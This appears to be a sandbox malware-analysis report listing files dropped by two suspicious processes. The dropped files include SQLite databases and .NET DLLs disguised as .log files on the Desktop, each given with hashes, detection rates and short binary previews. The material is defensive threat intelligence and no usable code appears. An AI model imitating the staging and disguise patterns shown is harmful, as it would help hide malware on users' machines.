                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\zHj11ltdCn

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\zSQAoKuSDj

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\AQlYVRJc.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.660491370279985
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 150bIjWiGH.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\ATGgGOGO.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38912
                                                                                                                                                                        Entropy (8bit):5.679286635687991
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\DWtPcxKJ.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                        Entropy (8bit):5.870612048031897
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\EOLhHxkb.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38912
                                                                                                                                                                        Entropy (8bit):5.679286635687991
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\EXjhrjDY.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                        Entropy (8bit):6.010605469502259
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Users\user\Desktop\GQyPcgoW.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64000
                                                                                                                                                                        Entropy (8bit):5.857602289000348
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\GUTYNdlI.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):89600
                                                                                                                                                                        Entropy (8bit):5.905167202474779
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                                                        C:\Users\user\Desktop\HNZYygDR.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33280
                                                                                                                                                                        Entropy (8bit):5.634433516692816
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\HRugjdAD.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.529329139831718
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\IECYOtkU.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\IwSFjKJP.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):50176
                                                                                                                                                                        Entropy (8bit):5.723168999026349
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\KCawqqLw.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                                                        C:\Users\user\Desktop\KUhOFMFy.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.660491370279985
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\MBrWacSF.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):24576
                                                                                                                                                                        Entropy (8bit):5.535426842040921
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\MJbpFLtL.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                        Entropy (8bit):5.636032516496583
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
